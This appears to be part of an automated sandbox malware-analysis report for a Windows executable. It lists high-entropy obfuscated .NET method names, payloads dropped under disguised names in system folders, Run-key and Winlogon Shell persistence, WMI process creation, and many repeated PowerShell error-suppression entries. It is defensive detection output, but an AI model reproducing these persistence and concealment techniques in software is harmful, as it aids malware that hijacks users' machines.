                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, eKPdhSK2vF5JmSfD0At.csHigh entropy of concatenated method names: 'method_0', 'HyPKHbwU7T', 'R0NK1a4kCm', 'z8YK6jc9vN', 'kRkKRmGsZL', 'u9UK9RDHjB', 'chqKnjgqBJ', 'gLIhioBmuXoidRXgqPU4', 'ebTc2oBmtFnXQKkNDdX3', 'QDMVrUBmgLYR7YsLLpol'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, rIDODOjSC2BqYJUV8EY.csHigh entropy of concatenated method names: 'PL4Hrg0ewf', 'AuZvc4Bxq7SkU02T0BTf', 'KuYJo3BxpP7hHGSBjnVU', 'JDjQcgBxC1WCbLk0Yhqe', 'kt5', 'zRKj7tEdJy', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, fXp7lqG5b1419J0hlcb.csHigh entropy of concatenated method names: 'eYwG34kLX6', 'AikGkpAKmi', 'fhTGqjLURt', 'F9KTkRBHOsrYOASqprXr', 'YHT25yBHAp0yu5PYHmdu', 'iC44MIBHEELEkBLuZqwX', 'Sr9S5cBHeuboLQhR9Lfb', 'RhYGy9xEpn', 'usDGsZeM7R', 'bHEGmAKKgg'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, zHtZF1etB8Yi7MPQT6H.csHigh entropy of concatenated method names: 'bCTeuMpWdF', 'bAHeQyX0gP', 'XFSe2mecvr', 'gd1ej3DBwe', 'DTOeH0oj69', 'BoRe1CIgTH', 'Xb7ETKB13JlEll6EHmp0', 'lpSqgaB1kHCsbyIg7Zs0', 'aharu8B1qIyKrVYwTVX8', 'ygc6q5B1p1iV9H3UkL4Z'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, jJiAf1toa8x8xy1AQV0.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'xymthtALHf', 'Write', 'h4qtG2jxXN', 'fLFtEtGgNX', 'Flush', 'vl7'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, LmLrE9hyXmNT5PPn4aC.csHigh entropy of concatenated method names: 'hxIhPtMb5F', 'Soe4nRBjOdFkVGa2lqnF', 's9va2hBjEcQYsOqDKiOX', 'eqOq60BjeCDu81rhCS3C', 'PSJDAgBjAayASIt7x3WG', 'vN1opWBjvYjwtYQDEsvs', 'U1J', 'P9X', 'KEXBbU8KOAi', 'qCaBbi4S71Q'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, Al58N732kOrItwneVtY.csHigh entropy of concatenated method names: 'JHa3HHMjid', 'uPP31MDfAb', 'ToD36k62VK', 'GPo3R6SiOh', 'Dispose', 'eWCRXPBq4XZyc85rCDBf', 'gKNIgwBqDqWtlXXFZEPb', 'xTstLVBq7teF4QqxgMFf', 'iI91LTBqc0ahTxoWrw3G', 'exh72yBq8HkTHS3qqOHv'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, bsnLd9gJsIZetF640ZZ.csHigh entropy of concatenated method names: 'LLag04a1Ka', 'UDdg3KGyHL', 'crDgkWns9j', 'Sg6gqGXTQV', 'biNgpNfcfW', 'rDUchtBap79rgTnR4XIJ', 'KAEbCSBakNGiuJK222yl', 'lP3floBaqyUVhAput0AR', 'X2bG3NBaCOXjFiPUXe5j', 'ghySvHBazppP5x06dOhd'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, LnLuPu8V05FNYi6y8hO.csHigh entropy of concatenated method names: 'FDN83N5k6a', 'HHc8klG5dC', 'hBw8q3xgVl', 'DfdRH3BmN58hrZBER71M', 'NCO87cBmAPyYXGR5nJPR', 'aT4FtOBmvqTt40r2tCf2', 'lHXenjBmYEhIbYfSijsV', 'fvp5fmBmrqSIE6sVunEb', 'Ql6lc1BmLs3fgxMhNZur'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, rXIKIlt5hpLfV0UYWn9.csHigh entropy of concatenated method names: 'oBFtpjKS6M', 'vkGtzIrcKj', 'BcZtyiBgYZ', 'GJKtsqR7mD', 'uiUtmnbZ8s', 'zwNta3P0cF', 'CqutXncDq6', 'PmAtPMRU9u', 'P6HtxnwgyK', 'iYDtZSkBqN'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, ClHWXZV2ybTDWrJFBuS.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KRNVHQSMOD', 'n01ZUgB3TRCPPtuykZQk', 'co4ZnUB35Ska5wbxWmB5', 'wxxNmbB3wFAcyjG5hxWM', 'WNQXbgB3yIq3SD6Whsv4', 'onwmn4B3sjvC86mwlJxd', 'jSMoiiB3mZjMSUmpP80N'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, HmYtZv4ZSpFB0RhGH9K.csHigh entropy of concatenated method names: 'qyf4VY39Ih', 'hL540VjVip', 'H7g43rs6Jk', 'kLj4kR7aPD', 'UZl4q44TVg', 'OOqvXXByzg1Cp9QHm3QD', 'sJ9hyOBypuZ57hQPMh1d', 'lfR5E3ByCmSiG8aZl3GU', 'MuUIZPBsF6vJbEWSlwNK', 'ehcwLqBsBU1XCdlVkrux'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, enAZfvE2nMXWbSsbAWm.csHigh entropy of concatenated method names: 'hW2EHE7BYs', 'YfBE1CXjX6', 'Of8V55BHZx71I2rjvIxm', 'gUAFIyBHJKAoM8NTjf12', 'f5WvlCBHVIL3xnIKeyva', 'CfbI4MBH0tqlsKuOiUHi', 'wgtosWBH3frNAhktQkE2', 'jc0CJkBHkuyYoswMM0P8'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, TrZZsgH6a6kj72ret59.csHigh entropy of concatenated method names: 'Close', 'qL6', 'go1H9xROhM', 'OOqHniCYrC', 'n8CHdiqcj9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, DUcSpHEfS4moNfpCwS8.csHigh entropy of concatenated method names: 'RmqEgO8qq1', 'AqkeVCBHmBAXVOCWWPAe', 'Ll1WK9BHa2atfjDuIudk', 'LdMM7kBHyIrPLHYjsOxx', 'dBk9uqBHs2hy7Uutc5A4', 'g7mtlTBHXVbGHqd9MBLl', 'TCDup1BHP3JIgg8yj2n1', 'rQRESYJUYc', 'Jm6EDv7yif', 'i57E7tDvil'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, oCY2SlL7HVNOmfawgMX.csHigh entropy of concatenated method names: 'OxlfY74GhX', 'YX3frxy3G5', 'f2mh0SBdZIrop8PPMH7k', 'qYSftDBdP41QoTv5Rqdl', 'EIbAqNBdx3a9DapIn7dg', 'P2g4DmBdJtd7WikhUSsX', 'jiesCeBdVZRhAcxd9LWi', 'CRPfff7IZV', 'FuSEu8Bdq5sIViKWqmUZ', 'vES8xBBd3VBNOureDIKC'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, stwjW6IrY3dA5D2SnIF.csHigh entropy of concatenated method names: 'KUfIIMnRlL', 'gdAd3QBTC2MRIxWkypQx', 'DExJx8BTz9Mt57t16ksa', 'KyPtn5BTq0TISJ6NgREk', 'wiRNBGBTpKRqc0QiZZXM', 'ujIIUweNVc', 'MbaFcYBTZ4TP9eo0eQMg', 'mQIILDBTP0Yv6D3G7eo2', 'KskMGDBTxFkpI8VS2OXo', 'v5naiYBTJNrlGofkpZZk'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, o85UtLpraMtZAmto0dI.csHigh entropy of concatenated method names: 'ae9WhwfC7SI', 'Gj8WhyffnnO', 'WMmswnBp5sARuwVaqMtG', 'YNRRmXBpwK1b9qJiHnE1', 'GcZ3G3BpyvYdAXOoCZWN', 'jUrxk9BpsgDPmeZLxJy9', 'xAZwnlBpm8n1TQTLYWmc'

                                    Persistence and Installation Behavior

                                    Source: C:\hyperContaineragent\Bridgecommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File written: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe | File created: C:\Users\user\Desktop\izhrsOEp.log
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe | File created: C:\hyperContaineragent\Bridgecommon.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe | File created: C:\Users\user\Desktop\WWLLRmVS.log
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\Users\user\Desktop\tYJQSSrA.log
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\Users\user\Desktop\EEEoXuLc.log
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exe

                                    Boot Survival

                                    Source: C:\hyperContaineragent\Bridgecommon.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bridgecommon
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | File created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bridgecommon

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\hyperContaineragent\Bridgecommon.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
